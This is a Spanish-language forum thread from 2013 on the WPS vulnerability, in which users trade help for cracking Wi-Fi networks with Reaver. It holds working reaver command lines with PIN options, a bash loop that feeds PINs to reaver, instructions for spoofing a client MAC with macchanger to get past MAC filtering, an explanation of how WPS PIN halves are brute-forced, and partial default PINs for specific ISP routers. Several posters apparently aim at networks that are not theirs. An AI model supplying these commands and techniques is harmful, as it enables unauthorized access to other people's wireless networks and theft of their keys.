tengo un router livebox con mac 00:19:70:xx:xx:xx
pin por defecto 12345670
y viene activado wps por defecto
resulta cuando hago comprbacion para sacar mi key m salta eso :
warning:detected AP rate limting ,waiting60 second before re-checking

Advertencia: detectada tasa AP limitante, espera 60 segundos antes de volver a comprobar
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: samuel20112020 en Enero 24, 2013, 21:40:23 pm
pero que tengo hacer

Enero 24, 2013, 21:42:00 pm
me vuelve todo el rate el mismo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Enero 25, 2013, 00:27:40 am
 
Puedes estar tranquila beinha. Las vodafone con esta mac, no tienen el WPS activado de fábrica, por tanto no son vulnerables. Ni tampoco se ha dado con el patrón (aun) de la clave WPA.

 Tienes uno de los mejores routers, en cuanto a seguridad se refiere.

 De todas formas, y para quedarte tranquila, puedes cambiar la clave y poner una más robusta y que alterne letras mayúsculas y minúsculas. En este caso, aunque se diera con el patrón, no podrían atacarte.

 Luego en el caso improbable que te sacaran la clave, impediría al intruso la entrada a la configuración del router, que como todos sabemos, el user y pass es "vodafone". Tambien le cambiría la clave de acceso. Más seguridad si cabe.

 No quiero atabalarte más... Tal como lo tienes ahora, puedes estar tranquila.  ;) 

 Saludoschau.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Enero 25, 2013, 19:58:22 pm
pero que tengo hacer

Enero 24, 2013, 21:42:00 pm
me vuelve todo el rate el mismo

Por lo que yo he comprobado esas redes con Mac 00:19:70 de orange de momento no e podido hacer nada con el reaver de otra forma no lo se si se puede hacer

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Luiscgs en Enero 26, 2013, 03:35:15 am
¿Hay alguna forma de hacer un ataque a un router con filtrado de MAC?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Enero 26, 2013, 04:51:01 am
Luiscgs por supuesto, apuntate la MAC del router a la que vas a atacar, falseas tu MAC con macchanger y te pones la del router, te permitira hacerle ataques como la asociación falsa entre otros.. y ver los usuarios conectados. Crackeas la red y la contraseña y te apuntas en un papel los usuarios de la red. (Este caso es si el router esta en la opcion de MAC filter "accept", si fuese "deny" no tendrias que hacer este proceso, porqué te cambias la mac a cualquiera) Si quieres que te explique eso dimelo.
Para luego conectarte es falseando la MAC del cliente que apuntaste y ponerla en windows.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Luiscgs en Enero 26, 2013, 16:25:59 pm
Luiscgs por supuesto, apuntate la MAC del router a la que vas a atacar, falseas tu MAC con macchanger y te pones la del router, te permitira hacerle ataques como la asociación falsa entre otros.. y ver los usuarios conectados. Crackeas la red y la contraseña y te apuntas en un papel los usuarios de la red. (Este caso es si el router esta en la opcion de MAC filter "accept", si fuese "deny" no tendrias que hacer este proceso, porqué te cambias la mac a cualquiera) Si quieres que te explique eso dimelo.
Para luego conectarte es falseando la MAC del cliente que apuntaste y ponerla en windows.

Si puedes explicármelo la verdad te lo agradecería… xD
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 26, 2013, 16:53:32 pm
Esto no es un chat pero un forum organizado en secciones
Las preguntas se hacen en los hilos adecuados, lo que tiene que ver con reaver en el foro linux, lo que es relativo al cambio de dirección mac en el foro windows, etc...
No se desvían los hilos y se pide al usuario que haga un mínimo de búsqueda antes de hacer una pregunta: Normas
Tienes multitudes de hilos sobre los temas que te interesan, solo te hace falta leer un poco en lugar de esperar a que se te responde.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Enero 26, 2013, 19:27:38 pm
 .
JAZZTEL_XXXX

MAC:38:72:C0:XX:XX:XX

WPS: 2017XXXX

WPA:

Router Comtrend.

He puesto el pin en JumpStart y se conecta. Saludos

[time]Diciembre 20, 2012, 00:29:09 am[/time]
vodafoneXXXX

MAC: 72:55:9C

WPS:0028XXXX

WPA: CAMBIADA.


Saqué el pin con PINwpsGui de maripuri y lo puse en reaver y me dio la clave en 12 segundos ( la cambiada ).
saludos hafid me pasa exactamente lo mismo tengo un pin que lo saque de la aplicacion de maripuri y como escribes el comando en reaver cuando ya tienes el pin para que te de la llave wpa. gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 26, 2013, 19:46:08 pm
« Respuesta #383 en: Enero 18, 2013, 18:57:40 pm » de este mismo hilo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Enero 26, 2013, 23:44:40 pm
gracias probare mañana Kcdtv oye sera necesario añadir el comando delay el -d otra cosa yo corro en un cd en linux y llega el momento en que se pilla y dice en la konsole que no queda espacio en mi device que tu opinas debere correr la aplicacion de linux en un disco duro externo que compre de 500g esta nuevo alli sin uso.un saludo hermano nuevamente gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 27, 2013, 00:31:14 am
haz un copiado-pegado del mensaje de error exacto utilizando el opción insertar código.  ;)
Estas en mode live y no tienes mas espacio en la RAM para capturar datos
Te aconsejo de pasar del modo live y instalar en dual boot linux conjuntamente a windows.
Mejor rendimiento, mas estabilidad y podrás hacer sessiones largas sin joder todo.
Te aconsejo linux Mint y seguir los pasos indicados en este tutorial WPS reaver dede 0
sino cualquier versión basada en debian tipo ubuntu es buena para empezar.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Enero 30, 2013, 16:39:42 pm
Gracias hermano Kcdtv voy a estar bregando con esto pero por el momento te pregunto como puedo guardar un archivo de hash o sea .cap que fue capturado en linux hacia windows o viceversa en mi caso capture en linux quiero llevarlo para windows pero ni idea y otra pregunta por que sera que trato de navegar el internet en linux y no puedo tengo un router antene tp-link wa5210 tambien en mi portatil una alfa awus036nh y dentro de la portatil tengo una atheros AR5007EG.dejame saber
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Enero 30, 2013, 17:33:22 pm
las preguntas sobre WPS y su vulnerabilidad (manejo de reaver, preguntas tericas etc...) aqui en este topic.
lo que preguntas ya no tiene mucho que ver con el tema.
Si estas en mode live tienes que enchufar un otro stick y poner tus capturas ahí, o en un HDD o si tyienes un disco interno que no sea :C, deberías poder ponerlos ahí
Lo démás, los problemas para conectarte ya no es auditoria asi que debrías abrir un tema en nuestro forum Linux sistema poniendo el resultado exacto de estos comando utilizando el opción insertar codigo:

Código: [Seleccionar]
iwconfig
Código: [Seleccionar]
lsusb
Código: [Seleccionar]
lspci
Código: [Seleccionar]
dmesg | grep ath
Antes de todo Necesitamos saber de que distribución hablas, que gestor de redes usas.
Te recuerdo : Nota para el foro linux, para no ver sus mensajes acabar directo en la papelera  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: bukanero en Enero 30, 2013, 19:34:44 pm
Una sencilla pregunta, pero que me ronda la cabeza últimamente.

Si en una sesión de Reaver recibo el mensaje M5 y envío el M6, ¿es seguro al 100% que los 4 primeros dígitos del PIN son correctos? Quiero decir, ¿hay alguna forma de que los paquetes estén corruptos y yo entienda que recibo el M5 sin ser así? (Aunque ya sería casualidad que cada vez que envío un PIN del estilo 1234XXXX todos estuviesen corruptos y diciéndome que 1234 es correcto). Si es seguro 100%, ¿también es cierto al 100% que los 4 dígitos restantes me van a devolver un M7? ¿O hay algún tipo de router que no envíe el M7? (Concretamente estoy hablando de las redes WLAN_XXXX con MAC 8C:0C:A3)

Ya he hablado en otro hilo de esto, pero mi duda viene a colación de si en el caso de que tenga los 4 primeros dígitos, en algún momento Reaver me garantiza que encontrará los 4 dígitos siguientes (suponiendo que pruebe las 10000 posibilidades), o si puede depender de factores como el router, si uso la opción -S u otras opciones, o del tráfico...

Un saludo.

Si los 4 primeros dígitos son correctos,no quedan 10.000 posibilidades,sino 1000...ya que pasa a probar sobre los tres siguientes,pasándole al último el checsum que programó heffner en reaver...algo así,suponiendo que los 4 primeros sean correctos:

1234001X
1234002X
1234003X

siendo x el checksum del último dígito del programa...algunos los pasan de 7 en 7,por ejemplo si acaba en 12349970 el siguiente sería 12349987 y se quedaría al 99%,por una razón,porque ha dejado sin poder probar todos los que acaben en 1-2-3-4-5-6-8-9...
creo que han salido reavers modificados teniendo esta cuestión en cuenta...empiezan por
12345670
11115670
22225670
y así hasta 99995670
y luego empieza por
00015670
0002xxxx
0003xxxx
 y así probando y probando hasta obtener los 4 primeros....que en total son 1000...luego pasa a los tres siguientes,que son otros mil,quedando el último que dependerá del router .....
Incluso empezando por un pin concreto,de no ser correcto,no empieza por el principio de nuevo,sino que continúa probando con los siguientes...cosa que no ocurría con reaver al principio,hasta que se "modificó" en xiaopan y similares....los he probado todos y bueno,me hago un lío para especificar versiones concretas...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Febrero 14, 2013, 10:27:39 am
Tal vez este diciendo una tontería y sea imposible de poner en práctica pero,¿se podría intentar con reaver u otro programa que las Orange no bloqueen la conexión WPS o incluso el activarlo en las que la tienen desactivado como las Jazztel_XXXX?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Febrero 23, 2013, 15:22:19 pm
las preguntas sobre WPS y su vulnerabilidad (manejo de reaver, preguntas tericas etc...) aqui en este topic.
Antes de todo Necesitamos saber de que distribución hablas, que gestor de redes usas.
Te recuerdo : Nota para el foro linux, para no ver sus mensajes acabar directo en la papelera  ;)

   Saludos kcdtv
                hermano he seguido trabajando intentando a veces no me gusta preguntar me gusta intentarlo leer orientarme pero cuando me desespero no vale tengo que preguntar ni modo.respondiendo a tu pregunta estoy usando Xiaopan 0.4.3 baje la ultima version la 0.4.5 pero aunque reconoce la tarjeta alfa awus036h no capta ninguna señal con wps activado bueno eso es otro tema la pregunta es he conseguido el pin de un belkin por la aplicacion de pines escribo los primeros 4 numeros del pin y me salta al 90% en el reaver pero luego de llegar al 91.8% se pilla de alli no pasa pone que  Warning 25 intentos corridos de start??? solo viro escaneo otra vez vuelvo a poner las opciones de pin y un delay de 4 que me ha funcionadoy arranca cada vez llega a mas porciento esta ultima llego 98% (uff estuvo cerca) te queria preguntar porque a un linksys que tengo aqui solo prendido sin acceso al internet le pude sacar la clave  sera motivo de power yo recibo el belkin a -53 entiendo que buen numero pero resulta extraño que al reiniciar si vaya sera que se bloquea el wps?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: javemora en Febrero 27, 2013, 20:13:41 pm
hay alguna forma de obligar a reaver para que se asocie con una red la cual aparentemente cumple todos los requisitos

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: aniir en Febrero 28, 2013, 22:00:03 pm
el proceso del reaver me tarda mas de dos horas y no me da nada .. es normal ?? gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanmose en Febrero 28, 2013, 22:39:41 pm
Amigo paciencia, dura más de 24h el proceso

Febrero 28, 2013, 22:43:29 pm
Mira:

 Key cracked in 62109 seconds


      AES-CCMP WPA/PSK     
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: aniir en Marzo 11, 2013, 15:56:13 pm
Gracias por el aporte . tengo un problema con el wpsreaver  . tengo la version 1.3 pero el procedimiento se queda en el 99.99%... gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: metrillo en Marzo 11, 2013, 19:41:17 pm
Hola,me he topado con una wlan_xxxx al parecer son 20 digitos alfanumericos mayusculas minusculas,he probado dos veces y se queda al 99,99 ¿realmente reaver puede descifrarla? ahi alguna manera de poder saber su wpa? si alguien se ha topado con algunas de estas redes y ha podido sacarla ,gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Marzo 11, 2013, 23:54:22 pm
Sabemos de que se trata,pero si no pones mas datos poco te podremos ayudar,ya que igual estas hablando de otra cosa....y,seguramente,cuando tengas los datos,a poco que busques en las chinchetas de este foro en vez de preguntar...daras tu mismo con la respuesta a tu pregunta  ;)

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: oscarelguapo2 en Marzo 18, 2013, 08:20:53 am
amigos tengo un pregunta de casualidad o saben si se puede meter el pin manualmente con algun comando o script en el reaver pro dvd live he leido e la paguina oficial y dice que su programa trae algo para sacar el pin y despues apoyarlo con reaver de antemano grasias amigos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: daniexd en Marzo 19, 2013, 02:35:01 am
hola buenas, me gustaria que si pudieran me digeren las diferentes formas de usar el reaver 1.4 yo solo conosco la de siempre reaver i1 mon0 -b mac -p ping -c canal -e essid -vv -d 0 delay si pudieran por e leido por hay que se si pongo el ping me sale la contraseña la cuestion es que lo pongo y se queda en 90% y sube pero muy lento si me pudieran ayudar , si hay alguna forma mas efectica  gracias de antemano :-[
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Marzo 19, 2013, 10:46:42 am

¿Y que pinta esto en Auditoria Windows WPA?   Lo muevo al subforo de linux pero en adelante presta mas atención

pd.  Mira la help del programa, allí están todas las opciones.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 19, 2013, 12:54:31 pm
Tenemos ya varios temas para hablar de ello, que sea en el foro linux o en el resto del foro, coloca tus preguntas en el foro adecuado y no habres un tema nuevo si ya hay temas adaptados.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: el lechero 317 en Marzo 29, 2013, 20:47:55 pm
alguien me podria decir como guardar una sesion y continuarla luego usando reaver en Xiaopan.gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: antoniox en Marzo 30, 2013, 22:50:30 pm
Hola, soy nuevo por aquí. Os saludo a todos y os agradezco toda la información que proporcionáis desinteresadamente. Gracias.  ;) A ver si alguien puede asesorarme de cómo saber el chipset de mi adaptador de red.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 30, 2013, 23:13:01 pm

  - con el comando
Código: [Seleccionar]
airmon-ng
ej:
Código: [Seleccionar]
root@Nosystem:/home/kcdtv/Escritorio# airmon-ng


Interface Chipset Driver

wlan3 Ralink RT2870/3070 rt2800usb - [phy3]



  - Si es USB con
Código: [Seleccionar]
lsusb
ej:
Código: [Seleccionar]
root@Nosystem:/home/kcdtv/Escritorio# lsusb
Bus 001 Device 008: ID 148f:3072 Ralink Technology, Corp. RT3072 Wireless Adapter
Bus 002 Device 002: ID 1c4f:0002 SiGma Micro Keyboard TRACER Gamma Ivory
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

  - y no tengo chipset pci asi que no pongo ejemplo pero lo podrías averiguar mirrando la salida de
Código: [Seleccionar]
lspci
Con "lspci" y "lsusb", vas a detectar todos los dispositivos aunque estén quemados, rotos, sin drivers, sin firmware etc..
Con airmon-ng vas a detectar solo los dispositivos compatibles mode monitor (es lo que necesitas para usar reaver y aircrack-ng, la mayoría de los dispositivos son compatibles)

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: antoniox en Marzo 31, 2013, 00:25:36 am
  - con el comando
Código: [Seleccionar]
airmon-ng
ej:
Código: [Seleccionar]
root@Nosystem:/home/kcdtv/Escritorio# airmon-ng


Interface Chipset Driver

wlan3 Ralink RT2870/3070 rt2800usb - [phy3]



  - Si es USB con
Código: [Seleccionar]
lsusb
ej:
Código: [Seleccionar]
root@Nosystem:/home/kcdtv/Escritorio# lsusb
Bus 001 Device 008: ID 148f:3072 Ralink Technology, Corp. RT3072 Wireless Adapter
Bus 002 Device 002: ID 1c4f:0002 SiGma Micro Keyboard TRACER Gamma Ivory
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

  - y no tengo chipset pci asi que no pongo ejemplo pero lo podrías averiguar mirrando la salida de
Código: [Seleccionar]
lspci
Con "lspci" y "lsusb", vas a detectar todos los dispositivos aunque estén quemados, rotos, sin drivers, sin firmware etc..
Con airmon-ng vas a detectar solo los dispositivos compatibles mode monitor (es lo que necesitas para usar reaver y aircrack-ng, la mayoría de los dispositivos son compatibles)

Ante todo gracias por tan buena explicación. Aunque no sé mucho de esto y no estoy a vuestro nivel de conocimientos. Supongo que estás hablando de un entorno bactrack o similares. Y ahí en bactrack o similares escribir ese comando "airmon-ng". Lo intentaré hacer y si sale a la primera será fácil. Tengo una tarjeta wifi externa usb. Así que supongo que ese es el chipset que tengo que averiguar. No sé si todas las tarjetas wifi del mismo modelo tienen el mismo chipset o eso no es así. Tengo una Ralink wireless LAN AWUS036NH 802 b/g/n. Alfa Network. Por eso pienso que el comando correcto es el que me indicas: "lsusb". Lo intentaré en el entorno de esos programas . Mi consulta se debe a un comentario de este mismo tema que he leído paro ahora no encuentro. Un usuario proporcionaba un sofware de la tarjeta AWUS036H  para windows pero que debía usarse si se disponía de un chipset determinado, creo que un 8187. Intentaré encontrar ese comentario. Saludos a tod@s.  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 31, 2013, 01:05:19 am
Me refiero a cualquier distribución linux a la cual instalas aircrack-ng y backtrack lo lleva integrado de serie
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tda20300 en Abril 01, 2013, 13:48:18 pm
Buenas a todos, una pregunta que no he encontrada contestada en el foro.
Imaginemos que con reaver he comprobado los primeros 400000 pines...
existe el comando que pueda lanzar el reaver desde el pin 400000?
No se si me explico, imaginemos que no he guardado la sesion pero se que que pines se han probado, puedo "forzar" a que empiece desde dodne yo quiera?

Un saludo y perdonad si ya esta contestado pero no lo he encontrado.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 1camaron1 en Abril 01, 2013, 14:58:26 pm
Citar
existe el comando que pueda lanzar el reaver desde el pin 400000?

sudo reaver -i INTERFACE -b MAC -c CANAL -p 400000 -vv

Saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tda20300 en Abril 01, 2013, 15:25:45 pm
muchas gracias,me lo apunto
un saludo ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: managuas en Abril 01, 2013, 15:35:50 pm
sudo reaver -i INTERFACE -b MAC -c CANAL -p 400000 -vv

Saludos.
camaron que dices que si le pongo sudo y un pin de 8 digitos este comienza ahi y sigue avanzando hacia arriva asta localizar primero los 4 digitos y despues el resto?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tda20300 en Abril 01, 2013, 16:21:57 pm
yo entiendo que si funcionaria..
pero como sabes que rango descartar?jejeje
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Abril 01, 2013, 19:17:19 pm
yo entiendo que si funcionaria..
pero como sabes que rango descartar?jejeje

Pues yo creo que no.Además, me gustaria que alguien me explicara,si se puede, como hacer que reaverempiece a probar desde 9999 y vaya bajando.Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 01, 2013, 19:23:03 pm
modificando reaver (fichero pin.c y algo más) o poniendo la orden reaver a dentro de un bucle for con valores definidos en un array para el parámetro "-p" y quizás tac o rev para invertir el orden creciendo  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Abril 01, 2013, 19:55:27 pm
modificando reaver (fichero pin.c y algo más) o poniendo la orden reaver a dentro de un bucle for con valores definidos en un array para el parámetro "-p" y quizás tac o rev para invertir el orden creciendo  ;)
Vamos que para alguien con mis conocimientos ,no se puede.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 01, 2013, 21:23:59 pm
Hay que intentarlo a lo menos antes de decir no se puede.  ;)
No te digo que no requiere algo de lectura y esfuerzo.
 Para reaver me parece que tienes que modificar lel ficheros key.C antes de compilar lo.
  Es decir abrir el fichero, ordenar las mitades de PIN y luego proceder con la compilación - instalación ( es decirm antes de escribir en consola " ./configure" y "make" y "make install".
  Tieners mucha documentación abundante para principiantes sobre lo que es compilar y instalar en linux; en 5 minutos te enteras.
  Luego para modificar le fichero lo haces cuidadosamente con un editor de texto y los guardas para que sean efectivos.
  Si por ejemplo solo quierers probar los PIN de 1000XXXX a 2000XXXX, pues quitas todas las primeras mitades de PIN dque no sean entre 1000 y 2000.
  para favorecer unos valores pones [1] en lugar de
  Empieza ya a averiguar por tu mismo una forma de conseguir algo, expone la y pide ayuda para redactar una función o intentar algo al respecto.
  No se si se logrará pero la cosa es intentar y aprender.

  Respecto a bash, lo mismo, todo se puede hacer con bash  y  lo teneís en cualquier linux, en vuestra consola, terminal
  Una idea, cutre, es poner nuestro  linea de comando revaer a dentro de un script para que reaver vaya tirando sucesivamente los PIN deseados con el opción -p.
 
Código: [Seleccionar]
for i in {1000..1050};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done

asi no ves nada en consola hasta que se acabepor esto 50 pines

podrías montarte un sistema con mandando 10 pin, mandar un mensaje en consola, mandar otro diez pin, o para cada pin si quieres

Código: [Seleccionar]
for i in {1000..1010};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done
echo " de 1000 hasta 1010"
for i in {1010..1020};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done
echo " de 1010 a 1020

maripuri: te arreglo este último code
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Abril 01, 2013, 21:54:14 pm
Hay que intentarlo a lo menos antes de decir no se puede.  ;)
No te digo que no requiere algo de lectura y esfuerzo.
 Para reaver me parece que tienes que modificar lel ficheros key.C antes de compilar lo.
  Es decir abrir el fichero, ordenar las mitades de PIN y luego proceder con la compilación - instalación ( es decirm antes de escribir en consola " ./configure" y "make" y "make install".
  Tieners mucha documentación abundante para principiantes sobre lo que es compilar y instalar en linux; en 5 minutos te enteras.
  Luego para modificar le fichero lo haces cuidadosamente con un editor de texto y los guardas para que sean efectivos.
  Si por ejemplo solo quierers probar los PIN de 1000XXXX a 2000XXXX, pues quitas todas las primeras mitades de PIN dque no sean entre 1000 y 2000.
  para favorecer unos valores pones [1] en lugar de

  Empieza ya a averiguar por tu mismo una forma de conseguir algo, expone la y pide ayuda para redactar una función o intentar algo al respecto.
  No se si se logrará pero la cosa es intentar y aprender.

  Respecto a bash, lo mismo, todo se puede hacer con bash  y  lo teneís en cualquier linux, en vuestra consola, terminal
  Una idea, cutre, es poner nuestro  linea de comando revaer a dentro de un script para que reaver vaya tirando sucesivamente los PIN deseados con el opción -p.
 
Código: [Seleccionar]
for i in {1000..1050};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done

asi no ves nada en consola hasta que se acabepor esto 50 pines

podrías montarte un sistema con mandando 10 pin, mandar un mensaje en consola, mandar otro diez pin, o para cada pin si quieres

Código: [Seleccionar]
for i in {1000..1010};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done
echo " de 1000 hasta 1010"
for i in {1010..1020};
  do
  reaver (opciones) - -p $i >> fichiero_de_salida ;
done
echo " de 1010 a 1020

maripuri: te arreglo este último code
El problema es que parto desde 0 pero lo intentar'e.Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 01, 2013, 22:08:07 pm
Ya sabes, si quieres desarrollar el tema y obtener ayuda, tenemos un foro linux sistema que es para estas preguntas mas técnicas respecto al manejo de linux.
Ya estamos desviando mucho el hilo y esto necesitaría un tema a parte porque no se puede montar algo de script correctamente en medio de un hilo dedicado a la brecha de seguridad sobre protocolo WPS. ( o ir reescribiendo parte del código de reaver)
Gracias maripuri por arreglar mi post  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: tda20300 en Abril 01, 2013, 23:36:59 pm
la que he liado con la preguntita jajajaja
a disfrutar cracks!
no me canso de aprender de vosotros
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: emisgallo en Abril 06, 2013, 12:30:21 pm
Este mi primer post.Utilizo el Xiaopan por medio de una consola virtual VMWarstation
Funciona perfecto con mi RTL8187.
Estoy problanco con una red WLAN_XXXX con una señal perfecta
Utilizando un pin 8339(sacado de este foro y comprobado su funcionamiento)solo llego al 99,99%.Lleva 24 horas.
Alguna solucion??
(http://i50.tinypic.com/30w78n6.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Abril 06, 2013, 12:45:21 pm
pues ese pin no te sirve  :o empiesa el ataque desde cero  sin poner  los 4 numeros aver que tal teva y despues comenta el resultado ;D un salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 06, 2013, 16:05:48 pm
No tiene que ver con el PIN
Tu ataque no se esta llevando correctamente, cuando pasas de 90% tienes que tener un M5, M6.
Ubique tu post en el hilo adecuado, se habla muchas vecesn de este falso positivo.
 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: abuabdellah en Abril 06, 2013, 20:22:33 pm
Este mi primer post.Utilizo el Xiaopan por medio de una consola virtual VMWarstation
Funciona perfecto con mi RTL8187.
Estoy problanco con una red WLAN_XXXX con una señal perfecta
Utilizando un pin 8339(sacado de este foro y comprobado su funcionamiento)solo llego al 99,99%.Lleva 24 horas.
Alguna solucion??
(http://i50.tinypic.com/30w78n6.jpg)
Ententalo con -vv con esto te sale los mensajes m1 m2 m3...
se ves que te sale el m6 eso quiere decir que los 4premiros son correctos seno empeza desde zero
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MACWifi en Abril 08, 2013, 02:00:04 am
Hola sabeis como puedo meter el pin si el WPS esta bloqueado o desactivado?

gracias

Abril 08, 2013, 02:37:22 am
Hola sabeis como puedo meter el pin si el WPS esta bloqueado o desactivado?
sabeis si hay un pin establesido en este hilo de la mac 8C:0C:A3:XX:XX:XX

gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fregasuelos en Abril 27, 2013, 02:50:59 am
Hola a todos hace tiempo que estoy desconectado de este mundillo, jejenes
 al usar el reaver se para en el 90% y siempre muestra el mismo pin, he leído que hay una modificación del reaver  para estos errores pero no lo encuentro, decir que uso una liveusb, haber si me ayudáis,saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Abril 27, 2013, 13:51:10 pm
NO creo ayude a resolver un problema el mero hecho de decir "uso una live USB" ni abrir un tema nuevo cuando ya existen hilos abiertos.. lo suyo será especificar "que tipo de linux es" como pueda ser UBUNTU, Open Suse, Mandriva.. kernel, driver's, adaptador.. y cosas que realmente puedan ayudar a detectar la causa ¿no crees?

Muevo el tema de nuevo al subforo linux, kcdtv ya comentas donde ubicarlo correctamente.. yo esto no lo sigo.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 27, 2013, 17:46:18 pm
Para poder responderte fregasuelos, hace falta tener los elementos pertinentes  ;) , a saber:

- modelo routeur
- modelo chipset interfaz mode monitor
- versión linux
- versión kernel
- versión driver
- versión aircrack-ng
- versión reaver
- + lo que te parezca relevante (problemas cn USB, conflictos, otros programas que no van, problemas durante loa instalación de reaver, de aircrack-ng etc.. etc..)



Contenido exacto en consolas de >
                                             wash
                                            reaver
              scan airodump-ng con filtro bssid y canal

editando los datos y usando el opción insertar codigó (no hace falta poner todo el log de reaver sino una muestra del fallo)
usar el opción -vv en reaver para obtener mas detalles en salida.

El único reaver modificado es para los routeurs que no respectan el checksum, lee el primer post de este hilo, encontrarás una buena explicación de Weiot sobre el asunto  > wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3   
Ten en cuenta que se trata de un falló de programación por parte del fabricante y no respecto de la norma WPS y que vale para muy pocos modelos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 27, 2013, 18:05:14 pm
Visto  ;D
Venga fregasuelo, hay diez normas que no han cambiado ¿tan dificil es aplicar esto  :o  ???
Con lo que has puesto en el post que esta en la papelera no dices nada
Y no cuesta nada proporcionar la información mínima. Si al menos se pone con copiado-pegado el resultado de


1 -
Código: [Seleccionar]
airmon-ng
2 - Ataque reaver con la sintaxis empleada

3 - Escaneo wash sobre objetivo

4 - Escaneo airodump-ng sobre objetivo (filtro bssid) con canal fijado (filtro canal)


Así podemos hablar de algo, sino no hay forma, pueden haber cienes de razones.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fregasuelos2 en Abril 28, 2013, 11:59:38 am
Seding etanol start request
Recéived identity request
Seding identity response
Recéived m1 Message
Seding m2 message
Recéived m3 message
Recéived wsc nack
Seding wsc nack
Quitting after 11000 crack attemp
Fáiled to recover wpa key


El comando que pongo es

Reaver -i mon0 - b xxxxxxxxxxx - vv
A lo mejor necesito otro comando y poner mas opciones?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 28, 2013, 18:46:32 pm
